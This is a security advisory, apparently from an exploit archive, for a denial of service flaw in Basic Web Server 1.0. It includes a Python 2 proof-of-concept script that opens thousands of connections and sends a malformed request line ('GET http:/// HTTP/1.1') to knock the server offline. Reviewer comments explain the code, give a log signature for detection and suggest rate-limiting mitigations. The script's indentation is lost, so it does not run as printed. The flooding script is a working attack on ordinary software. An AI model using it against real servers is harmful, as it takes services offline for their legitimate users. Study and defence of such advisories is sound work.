Basic Web Server version 1.0 suffers from a denial of service vulnerability.
c64a16a1215e15fdd05b0d8e52e280e1edd81d17e91c02da2ec7d8ef7d90b69b
# ------------------------------------------------------------------------
# Software................Basic Web Server 1.0
# Vulnerability...........Denial Of Service
# Download................http://www.bit4free.com/
# Release Date............9/16/2010
# Tested On...............Windows XP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
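# Flooding the server with malformed HTTP requests results in the server
# failing to respond to legitimate requests. The malformed request in the
# PoC below is a request line whose absolute-form target has an empty host
# ("GET http:/// HTTP/1.1"); the well-formed "GET /" that follows it only
# checks whether the server still answers.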
#
#
# --PoC--
import socket
# Proof-of-concept from the advisory, written in Python 2 syntax (print
# statements, a str passed straight to send()).
# NOTE(review): the indentation of this listing was lost in publication, so the
# nesting of the two loops and the position of the final liveness check cannot
# be recovered with certainty from this text.
#
# Target settings: the defaults address a server on the local machine.
host = 'localhost'
port = 80
# include_file and complete_path are assigned here but never read below.
include_file = True
complete_path = True
try:
# Repeated connection attempts. If the second loop is nested in the first, as
# the statement order suggests, that is 1024 * 8 = 8192 connections in total.
for i in range(0, 1024):
for x in range(0, 8):
# A new TCP socket is created for every request and close() is never called;
# the previous socket is only released when `s` is rebound.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect() runs before settimeout(), so the 2-second timeout does not apply
# to the connection attempt itself, only to the calls that follow it.
s.connect((host, port))
s.settimeout(2)
# The malformed request: an absolute-form target with a scheme but an empty
# host. No recv() follows it, so the client never reads the server's reply.
# NOTE(review): for detection, this exact request line repeated at a high rate
# from one source is the signature visible in access logs or packet captures.
s.send('GET http:/// HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')
# Progress marker; the trailing comma suppresses the newline in Python 2.
print '.',
# Liveness check: a well-formed request whose response is awaited for up to
# 2 seconds (the timeout set after connect()).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(2)
s.send('GET / HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')
s.recv(8192)
print 'response received'
# The bare except catches every exception raised above, so a refused
# connection, a timeout on the liveness check and a keyboard interrupt all
# print the same message and cannot be told apart from the output.
# NOTE(review): the advisory names no fixed version. Per-source connection and
# request-rate limits, or a reverse proxy that rejects request targets with an
# empty host, are the usual mitigations to evaluate in front of this server.
except:
print 'error contacting server'